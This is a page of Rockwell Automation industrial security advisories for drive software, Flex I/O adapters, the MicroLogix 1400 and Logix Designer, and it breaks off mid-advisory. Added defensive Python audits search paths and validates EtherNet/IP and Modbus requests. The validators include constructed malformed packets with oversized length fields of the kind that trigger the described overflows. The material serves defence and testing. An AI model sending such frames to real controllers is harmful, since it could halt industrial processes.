PN1543 | PN1543 | Writable Path Directory in DriveTools SP and Drives AOP
Published Date:
February 15, 2021
Last Updated:
February 15, 2021
CVE IDs:
CVE-2021-22665
Products:
9303 DriveTools SP
CVSS Scores:
7.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.1

Executive Summary

Rockwell Automation received a report from both Cim Stordal of Cognite and Claroty regarding a vulnerability in DriveTools™ and Drives AOP. If successfully exploited, this vulnerability may result in privilege escalation and total loss of device confidentiality, integrity, and availability.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Special thanks to both Cognite and Claroty for their work discovering this vulnerability.

Affected Products

DriveExecutive v5.13 and below.
DriveTools SP v5.13 and below.
Drives AOP v4.12 and below.

Vulnerability Details

CVE-2021-22665: Privilege Escalation Vulnerability due to Uncontrolled Search Path Element
DriveTools and Drives AOP both contain a vulnerability that a local attacker with limited privileges may be able to exploit resulting in privilege escalation and complete control of the system.

CVSS v3.1 Score: 7.5/10 High
CVSS v3.1 Vector String: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H
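CWE-427 bugs of this kind become exploitable only when some directory on the application's library search path is writable by a less privileged user than the one that will later load from it. The following audit script is an added example, not Rockwell Automation, Cognite or Claroty code, and the advisory does not say which directory DriveTools or Drives AOP searched; it checks the directories a loader would consult, from stat() mode bits, so its results do not depend on who runs it. On Windows the mode bits carry no ACL information, so there the equivalent check is `icacls <dir>` on each PATH entry, looking for Users or Authenticated Users holding (W), (M) or (F). The temporary directories in `demo()` are a constructed fixture.

```python
"""Find search-path directories an unprivileged user could write to
(CWE-427, uncontrolled search path element). Added example; see lead-in."""
import os
import stat
import tempfile
from typing import Dict, List, Sequence, Tuple


def audit_search_path(entries: Sequence[str],
                      trusted_uids: Sequence[int] = (0,)) -> Dict[str, List[str]]:
    """Return {entry: [finding, ...]} for every entry that needs attention.

    missing         directory does not exist; if its parent is writable an
                    attacker can create it and plant a DLL/.so there
    world-writable  any local user can create files in it
    group-writable  members of the owning group can create files in it
    untrusted-owner owner is not in trusted_uids and can replace contents
    relative-entry  "" or "." means whatever the current directory is
    """
    findings: Dict[str, List[str]] = {}
    for entry in entries:
        notes: List[str] = []
        if entry in ("", "."):
            notes.append("relative-entry")
        try:
            st = os.stat(entry or ".")
        except FileNotFoundError:
            findings[entry] = notes + ["missing"]
            continue
        if not stat.S_ISDIR(st.st_mode):
            notes.append("not-a-directory")
        if st.st_mode & stat.S_IWOTH:
            notes.append("world-writable")
        if st.st_mode & stat.S_IWGRP:
            notes.append("group-writable")
        if st.st_uid not in trusted_uids:
            notes.append(f"untrusted-owner:{st.st_uid}")
        if notes:
            findings[entry] = notes
    return findings


def audit_process_path(trusted_uids: Sequence[int] = (0,)) -> Dict[str, List[str]]:
    """Audit the PATH this process would hand to a library loader."""
    return audit_search_path(os.environ.get("PATH", "").split(os.pathsep), trusted_uids)


def demo() -> Tuple[List[str], List[str], bool]:
    """Constructed fixture: a world-writable directory, a dangling entry
    below it, and whether the same directory is still flagged at 0755."""
    me = getattr(os, "getuid", lambda: 0)()
    base = tempfile.mkdtemp(prefix="pathaudit-")
    try:
        os.chmod(base, 0o777)
        dangling = os.path.join(base, "vendor-bin")
        loose = audit_search_path([base, dangling], trusted_uids=(me,))
        os.chmod(base, 0o755)
        tight = audit_search_path([base], trusted_uids=(me,))
        return loose[base], loose[dangling], base in tight
    finally:
        os.chmod(base, 0o700)
        os.rmdir(base)


if __name__ == "__main__":
    for directory, notes in audit_process_path().items():
        print(f"{directory!r}: {', '.join(notes)}")
```

Run it under the account that launches the engineering software, not as an administrator: the question is whether that account's search path contains a directory that a different, lower privileged account can write to, which is exactly the case the "run as User, not Administrator" and AppLocker guidance below is meant to contain.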

Risk Mitigation & User Action

Customers using the affected versions are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards the risk mitigation strategies provided below and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Vulnerability | Suggested Actions
CVE-2021-22665 | Apply DriveTools SP v5.14 or later (Download). Apply Drives AOP v4.13 or later (Download).

Customers using affected versions can reach out to their account manager or distributor to request a newer version.

General Security Guidelines

Software/PC-based Mitigation Strategies
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft AppLocker or other similar allow list application can help mitigate risk.  Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article QA17329 .
  • Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.

General Mitigations
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
 
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS
  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide


 

High
PN1531 | PN1531 | 1794-AENT Flex I/O Series B Contains Multiple Denial of Service Vulnerabilities
Published Date:
February 02, 2021
Last Updated:
February 02, 2021
CVE IDs:
CVE-2020-6085, CVE-2020-6084, CVE-2020-6088, CVE-2020-6083, CVE-2020-6087, CVE-2020-6086
Products:
Flex I/O, 1794 Flex, 1794/5094 Distributed I/O
CVSS Scores:
7.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
2.0
Revision History
February 2, 2021 - Version 2.0. Updated Risk Mitigation & User Actions.
Revision History
Revision Number
1.1
Revision History
November 4, 2020 - Version 1.1. Updated Vulnerability Details.
October 12, 2020 - Version 1.0. Initial Version.


Executive Summary

Rockwell Automation received a report from Jared Rittle of Cisco Talos regarding multiple vulnerabilities in the 1794-AENT Flex I/O Series B adapter. If successfully exploited, these vulnerabilities may lead to denial-of-service conditions.

Customers using affected versions of this firmware are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

1794-AENT Flex I/O, Series B, versions 4.003 (and earlier).

Vulnerability Details

CVE-2020-6083: Denial of Service due to Ethernet/IP Request Path Port Segment Buffer Overflow
A buffer overflow vulnerability exists in the Ethernet/IP Request Path Port Segment. This vulnerability could allow a remote, unauthenticated attacker to send a malicious packet resulting in a denial-of-service condition on the device.

CVSS v3.1 Base Score: 7.5 /10 [HIGH]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2020-6084, CVE-2020-6085: Denial of Service due to Ethernet/IP Request Path Logical Segment Buffer Overflow
A buffer overflow vulnerability exists in the Ethernet/IP Request Path Logical Segment. This vulnerability could allow a remote unauthenticated attacker to send a malicious packet resulting in the device entering a fault state causing a denial-of-service condition.

CVSS v3.1 Base Score:7.5 /10 [HIGH]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2020-6086, CVE-2020-6087: Denial of Service due to Ethernet/IP Request Path Data Segment Buffer Overflow
A buffer overflow vulnerability exists in the Ethernet/IP Request Path Data Segment. This vulnerability could allow a remote unauthenticated attacker to send a malicious packet resulting in the device entering a fault state causing a denial-of-service condition.

CVSS v3.1 Base Score:7.5 /10 [HIGH]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Version 1.1 Update:
CVE-2020-6088: Denial of Service due to Ethernet/IP Request Path Network Segment Buffer Overflow
A buffer overflow vulnerability exists in the Ethernet/IP Request Path Network Segment. This vulnerability could allow a remote, unauthenticated attacker to send a malicious packet resulting in a denial-of-service condition on the device.

CVSS v3.1 Base Score: 7.5 /10 [HIGH]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
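All six CVEs above sit in the same structure: the CIP request path (EPATH) carried in EtherNet/IP, which is a sequence of port, logical, network and data segments whose lengths come from the packet itself. The parser below is an added example, not Rockwell Automation or Cisco Talos code, and the page does not describe the adapter's actual fault; it shows the one property every EPATH consumer must enforce, namely that a segment's own length byte is never trusted beyond the bytes that actually arrived. Segment layouts follow the CIP specification (Volume 1, Appendix C); the sample paths are constructed, not captured traffic.

```python
"""Bounds-checked parser for a CIP request path (EPATH). Added example."""
from typing import List, Tuple

Segment = Tuple[str, bytes]

# Segment type lives in the top three bits of each segment's first byte.
PORT, LOGICAL, NETWORK, DATA = 0x00, 0x20, 0x40, 0x80


class EPathError(ValueError):
    """A segment claims more bytes than the buffer holds, or is unknown."""


def _need(buf: bytes, pos: int, n: int) -> bytes:
    # Every read of segment content goes through this check. Without it a
    # length byte of 0xFF inside a 10-byte packet becomes an over-read or,
    # once copied into a fixed-size buffer, the overflow the advisory names.
    if n < 0 or pos + n > len(buf):
        raise EPathError(f"offset {pos}: needs {n} byte(s), {len(buf) - pos} remain")
    return buf[pos:pos + n]


def parse_epath(buf: bytes) -> List[Segment]:
    """Split buf into (kind, raw_segment) tuples or raise EPathError."""
    segments: List[Segment] = []
    pos = 0
    while pos < len(buf):
        start = pos
        first = buf[pos]
        pos += 1
        kind = first & 0xE0
        if kind == PORT:
            # Low nibble is the port; 0xF means a 16-bit port number follows.
            # Bit 4 means a length-prefixed link address follows, padded to even.
            if first & 0x0F == 0x0F:
                _need(buf, pos, 2); pos += 2
            if first & 0x10:
                link_len = _need(buf, pos, 1)[0]; pos += 1
                _need(buf, pos, link_len); pos += link_len
                if (pos - start) & 1:
                    _need(buf, pos, 1); pos += 1
            else:
                _need(buf, pos, 1); pos += 1
            segments.append(("port", buf[start:pos]))
        elif kind == LOGICAL:
            if first == 0x34:
                # Electronic key: format byte 0x04, then vendor, device type,
                # product code, major and minor revision (8 bytes).
                if _need(buf, pos, 1)[0] != 0x04:
                    raise EPathError(f"offset {start}: unknown key format")
                pos += 1
                _need(buf, pos, 8); pos += 8
            else:
                # Low two bits give the value width: 0 -> 8-bit, 1 -> 16-bit,
                # 2 -> 32-bit; the wider forms are preceded by one pad byte.
                width = {0: 1, 1: 2, 2: 4}.get(first & 0x03)
                if width is None:
                    raise EPathError(f"offset {start}: reserved logical format")
                if width > 1:
                    _need(buf, pos, 1); pos += 1
                _need(buf, pos, width); pos += width
            segments.append(("logical", buf[start:pos]))
        elif kind == NETWORK:
            if first & 0x1F == 0x1F:
                # Extended network segment: word count, then that many words.
                words = _need(buf, pos, 1)[0]; pos += 1
                _need(buf, pos, 2 * words); pos += 2 * words
            else:
                # Schedule, fixed tag, production inhibit time: one data byte.
                _need(buf, pos, 1); pos += 1
            segments.append(("network", buf[start:pos]))
        elif kind == DATA:
            if first == 0x80:
                # Simple data segment: word count, then that many words.
                words = _need(buf, pos, 1)[0]; pos += 1
                _need(buf, pos, 2 * words); pos += 2 * words
            elif first == 0x91:
                # ANSI extended symbol: byte count, symbol, pad to even length.
                n = _need(buf, pos, 1)[0]; pos += 1
                _need(buf, pos, n); pos += n
                if n & 1:
                    _need(buf, pos, 1); pos += 1
            else:
                raise EPathError(f"offset {start}: unsupported data segment")
            segments.append(("data", buf[start:pos]))
        else:
            raise EPathError(f"offset {start}: unsupported segment 0x{first:02x}")
    return segments


def is_well_formed(buf: bytes) -> bool:
    """True when every segment fits inside buf: the minimum a filter should
    require before forwarding a request to the adapter on port 44818."""
    try:
        parse_epath(buf)
        return True
    except EPathError:
        return False


# Constructed samples (not captured traffic).
GOOD_LOGICAL = bytes.fromhex("2004 2401 3003")            # Class 4, Instance 1, Attribute 3
GOOD_PORT = bytes.fromhex("1205") + b"hello" + b"\x00"    # port 2, link "hello", pad byte
GOOD_SYMBOL = bytes.fromhex("9104") + b"Tag1"             # symbolic segment, even length
GOOD_KEY = bytes.fromhex("3404 0100 0e00 3600 0101")      # electronic key segment
BAD_DATA = bytes.fromhex("8040") + b"\x00" * 4            # claims 64 words, carries 4 bytes
BAD_SYMBOL = bytes.fromhex("9120") + b"Tag1"              # claims 32 bytes, carries 4
BAD_NETWORK = bytes.fromhex("5f7f")                       # extended network seg, no payload
BAD_PORT = bytes.fromhex("1f0001")                        # 16-bit port, link size missing
```

The four BAD_* paths are the four segment types the CVE titles name, each with a length field larger than the packet; a conforming implementation rejects them at the `_need` check rather than reading or copying past the buffer.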

Risk Mitigation & User Action

Customers using the affected firmware versions are directed towards risk mitigation. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy. Please subscribe to updates to this advisory and the Industrial Security Advisory Index to stay notified.

Vulnerabilities | Affected Products | Suggested Mitigations
CVE-2020-6083, CVE-2020-6084, CVE-2020-6085, CVE-2020-6086, CVE-2020-6087, CVE-2020-6088 | 1794-AENT Flex I/O, Series B, firmware versions 4.003 and earlier | Version 2.0: Apply firmware v4.004 (download). Version 1.0: It is recommended that customers use this module in the Cell/Area Zone (Level 1) as defined on page 16 of the System Security Design Guidelines and only accept CIP connections from trusted sources via port 44818.

For successful exploitation, these vulnerabilities require EtherNet/IP packets to reach the destination device. To reduce risk, customers should ensure they are employing proper network segmentation and security controls. Specifically, network exposure for all control system devices should be minimized and control systems should be behind firewalls and isolated from other networks when possible. Refer to the Converged Plantwide Ethernet (CPwE) Design and Implementation Guide for best practices deploying network segmentation and broader defense-in-depth strategies.

Customers should consider using proper network infrastructure controls, such as firewalls, UTM devices, VPN, or other security appliances.

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Utilize proper network infrastructure controls, such as firewalls, to help ensure that traffic from unauthorized sources is blocked.

Social Engineering Mitigation Strategies
  • Do not click on or open URL links from untrusted sources.
  • Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.

General Mitigations
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID PN715.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).
Please direct all media inquiries to Kolve Byrd (kabyrd@rockwellautomation.com).

High
PN1545 | PN1545 | Modbus Vulnerability may lead to Denial-of-Service conditions in the MicroLogix 1400 Controller
Published Date:
January 28, 2021
Last Updated:
January 28, 2021
CVE IDs:
CVE-2021-22659
Products:
1766 MicroLogix 1400
CVSS Scores:
8.1
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.0
Revision History
Version 1.0 - January 28, 2021. Initial release.

Executive Summary

Rockwell Automation received a report from Parul Sindhwad and Dr. Faruk Kazi from COE-CNDS, Veermata Jijabai Technological Institute (VJTI), India regarding a vulnerability in the MicroLogix™ 1400 controller. If successfully exploited, this vulnerability may result in denial-of-service conditions.

This vulnerability does not impact MicroLogix 1400 controller users who have Modbus TCP disabled.

Customers using affected versions of this controller are encouraged to evaluate the following mitigations and apply them appropriately to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

MicroLogix 1400, all series version 21.6 and below.

Vulnerability Details

CVE-2021-22659: Buffer Overflow may lead to Denial-of-Service Conditions
A remote, unauthenticated attacker may be able to send a specially crafted Modbus packet that allows the attacker to retrieve or modify arbitrary register values. If successfully exploited, this may lead to a buffer overflow resulting in a denial-of-service condition. The FAULT LED will flash red and communications may be lost. Recovery from the denial-of-service condition requires the fault to be cleared by the user.

CVSS v3.1 Base Score: 8.1/10[HIGH]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:H
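Where Modbus TCP cannot be disabled, the practical control is to let only well-formed requests from known clients reach the controller. The validator below is an added example, not Rockwell Automation or VJTI code, and the page does not say which field the MicroLogix 1400 mishandles; it shows the consistency checks a protocol-aware firewall, proxy or test harness should apply before forwarding a frame: MBAP length against bytes received, PDU size, per-function PDU layout, register quantity limits, address wrap, and the byte count of a multi-register write. The function-code allowlist is a policy assumption for the example; the frames are constructed, not captured.

```python
"""Sanity-check a Modbus/TCP request before forwarding it to a PLC. Added example."""
import struct
from typing import Tuple

MAX_PDU = 253                 # Modbus/TCP PDU limit (260-byte ADU minus 7-byte MBAP)
MAX_READ_REGS = 125           # FC 3/4: at most 125 registers per request
MAX_WRITE_REGS = 123          # FC 16: at most 123 registers per request
ALLOWED_FCS = {3, 4, 6, 16}   # assumed policy: only the register functions in use


class ModbusFrameError(ValueError):
    """Frame is malformed or outside policy; drop it rather than forward it."""


def _check_range(addr: int, qty: int, limit: int) -> None:
    if not 1 <= qty <= limit:
        raise ModbusFrameError(f"quantity {qty} outside 1..{limit}")
    if addr + qty > 0x10000:
        raise ModbusFrameError("register range wraps past address 0xFFFF")


def validate_request(frame: bytes) -> Tuple[int, int, int]:
    """Return (transaction_id, unit_id, function_code) for an acceptable frame."""
    if len(frame) < 8:
        raise ModbusFrameError("shorter than MBAP header plus function code")
    tid, proto, length, unit = struct.unpack(">HHHB", frame[:7])
    if proto != 0:
        raise ModbusFrameError(f"protocol id {proto} is not Modbus")
    # MBAP length counts unit id plus PDU; it must match what arrived, or a
    # receiver that trusts it reads or copies past the end of the packet.
    if length != len(frame) - 6:
        raise ModbusFrameError(f"MBAP length {length}, but {len(frame) - 6} bytes present")
    pdu = frame[7:]
    if len(pdu) > MAX_PDU:
        raise ModbusFrameError("PDU longer than 253 bytes")
    fc = pdu[0]
    if fc not in ALLOWED_FCS:
        raise ModbusFrameError(f"function code {fc} not allowed by policy")
    if fc in (3, 4):                               # Read Holding / Input Registers
        if len(pdu) != 5:
            raise ModbusFrameError("read request PDU must be 5 bytes")
        addr, qty = struct.unpack(">HH", pdu[1:5])
        _check_range(addr, qty, MAX_READ_REGS)
    elif fc == 6:                                  # Write Single Register
        if len(pdu) != 5:
            raise ModbusFrameError("write single register PDU must be 5 bytes")
    elif fc == 16:                                 # Write Multiple Registers
        if len(pdu) < 6:
            raise ModbusFrameError("write multiple registers PDU too short")
        addr, qty, nbytes = struct.unpack(">HHB", pdu[1:6])
        _check_range(addr, qty, MAX_WRITE_REGS)
        # Three lengths describe one payload; all three must agree.
        if nbytes != 2 * qty or len(pdu) != 6 + nbytes:
            raise ModbusFrameError(f"byte count {nbytes} disagrees with quantity {qty} "
                                   f"or payload of {len(pdu) - 6} bytes")
    return tid, unit, fc


def is_acceptable(frame: bytes) -> bool:
    try:
        validate_request(frame)
        return True
    except ModbusFrameError:
        return False


def mbap(tid: int, unit: int, pdu: bytes) -> bytes:
    """Prepend a correct MBAP header (used to build the samples below)."""
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit) + pdu


# Constructed samples.
GOOD_READ = mbap(1, 1, struct.pack(">BHH", 3, 0x0000, 10))                       # read 10 regs
GOOD_WRITE = mbap(2, 1, struct.pack(">BHHB", 16, 0x0010, 2, 4) + b"\x00\x01\x00\x02")
BAD_QUANTITY = mbap(3, 1, struct.pack(">BHH", 3, 0x0000, 2000))                  # 2000 > 125
BAD_MBAP_LEN = struct.pack(">HHHB", 4, 0, 200, 1) + struct.pack(">BHH", 3, 0, 10)  # 200 != 6
BAD_BYTE_COUNT = mbap(5, 1, struct.pack(">BHHB", 16, 0, 2, 10) + b"\x00" * 10)   # 10 != 2*2
BAD_WRAP = mbap(6, 1, struct.pack(">BHH", 3, 0xFFF0, 32))                        # past 0xFFFF
```

The point of checking all three lengths in a multi-register write is that a device which trusts any one of them in isolation can be made to index or copy beyond its register file; the same reasoning applies to the MBAP length, which the TCP layer does not validate for you.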

Risk Mitigation & User Action

Customers using the affected controller are directed towards risk mitigation. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy.

All users, if applicable, may disable Modbus TCP support if it is not necessary for their MicroLogix 1400 implementation. Without Modbus TCP enabled, a potential attacker does not have access to exploit the device using this vulnerability.

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Utilize proper network infrastructure controls (such as firewalls) to help ensure that Modbus TCP traffic from unauthorized sources is blocked.
  • Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see Knowledgebase Article BF7490.

Software/PC-based Mitigation Strategies
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft® AppLocker or other similar allow list application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article QA17329.
  • Ensure that the least-privilege user principle is followed and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.

General Mitigations
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please see our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation at PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).


ADDITIONAL LINKS
  • PN1354 - Industrial Security Advisory Index.
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • ICSA-21-033-01

Medium
PN794 | PN794 | RSLogix 5000 Studio 5000 Logix Designer Source Protection Vulnerability
Published Date:
January 25, 2021
Last Updated:
January 25, 2021
CVE IDs:
CVE-2014-0755
Products:
Logix Designer
CVSS Scores:
6.3
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
2.0
Revision History
Version 2.0 – January 25, 2021 – Advisory updated for clarification.
Revision History
Revision Number
1.0
Revision History
Version 1.0 – February 04, 2014 – Initial Release. Originally Titled “RSLogix™ 5000 Password Vulnerability”.

Executive Summary

It has come to Rockwell Automation’s attention that a vulnerability exists in RSLogix 5000® and Studio 5000 Logix Designer® that, when exploited, provides access to content that was secured using Source Key Protection, and in some instances, may expose the password used for that protection.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.


Affected Products

Project content applying access control with Source Key Protection using an sk.dat file in RSLogix 5000 and/or Studio 5000 product software v7 and above.

Note: This does not apply to project content protected with License Source Protection. To determine what solution is in use, refer to Logix 5000 Controllers Security, 1756-PM016O-EN-P.

Vulnerability Details

CVE-2014-0755: Insufficiently Protected Credentials
A vulnerability exists in RSLogix 5000 and Studio 5000 Logix Designer that, when exploited, may allow a local, unauthenticated attacker to access and modify project files that are password protected using Source Key Protection and, in some instances, may expose those passwords. Project files include files with the ACD, L5X, or L5K extensions. Successful exploitation will not directly disrupt the operation of Rockwell Automation programmable controllers or other devices in the control system.

CVSS v2 Base Score: 6.3
CVSS v2 Vector: AV:L/AC:M/AU:N/C:C/I:C/A:N

Risk Mitigation & User Action

Customers using the affected software versions are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed toward the risk mitigation strategies provided below and are encouraged, when possible, to combine these tactics with the general security guidelines to employ multiple strategies simultaneously.
Vulnerability Details | Recommended User Actions
CVE-2014-0755 | Risk Mitigation Strategy A or Risk Mitigation Strategy B, as described below.

Risk Mitigation Strategy A:
For stronger protection, apply License Source Protection, introduced in v26.

To apply License Source Protection to content that is protected with Source Key Protection, the Source Key Protection must be removed before License Source Protection is applied. Once content is protected with License Source Protection, it must be downloaded to the appropriate controller to mitigate the risk associated with this vulnerability. Refer to Logix 5000 Controllers Security, 1756-PM016O-EN-P (rockwellautomation.com), for more information about Source Protection.

Risk Mitigation Strategy B:
In addition to using current software, we also recommend the following actions to concerned customers who continue to use Source Key Protection. Where possible:
  • Adopt a practice to track the creation and distribution of protected ACD files, including duplicates and derivatives that contain protected content, so that these files can be found or disposed of in the future.
  • Securely archive project files that contain content password protected with Source Key Protection in a manner that prevents unauthorized access. For instance, store project files that use Source Key Protection in physical and logical locations where access can be controlled, and keep the files in a protected and potentially encrypted form.
  • Securely transmit project files that contain content password protected with Source Key Protection in a manner that prevents unauthorized access. For instance, email project files that use Source Key Protection only to known recipients, and encrypt the files such that only the target recipient can decrypt the content.
  • Restrict physical network access to controllers containing password protected content to authorized parties only, to help prevent unauthorized uploading of protected material into an ACD file. Note: For some customers, FactoryTalk Security software may be a suitable option to assist with applying a role-based access control solution to their system. FactoryTalk Security was integrated into RSLogix 5000 v10.00 and above.
  • Adopt a password management practice to periodically change passwords applied to routines and Add-On Instructions, to help mitigate the risk that a learned password remains usable for an extended period or indefinitely.


IMPORTANT: Files with Source Key Protection password protected content that have been opened and updated using v20.03 software and above will no longer be compatible with earlier versions of the software. For example, a v20.01 project file with password protected content that has been opened and re-saved using v20.03 software can only be opened with v20.03 software and higher. Also, a v21.00 project file with protected content that has been opened and re-saved using v21.03 software can only be opened with v21.03 and higher versions of software.

For the procedure to update older project files to v20.03 (or later), refer to the FAQ for V20.03 at KnowledgeBase ID: IN64.

General Security Guidelines

Software/PC-based Mitigation Strategies
The following Software/PC Mitigations may be appropriate to include when the vulnerability is within a software product running on a PC:
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Using Microsoft AppLocker or a similar allow-list application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article ID QA17329.
  • Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.
General Mitigations
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID PN715.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).



ADDITIONAL LINKS
  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • ICS Advisory (ICSA-14-021-01)

High
PN1540 | PN1540 | FactoryTalk Linx and FactoryTalk Services Platform Contain Denial-of-Service Vulnerabilities
Published Date:
January 22, 2021
Last Updated:
January 22, 2021
CVE IDs:
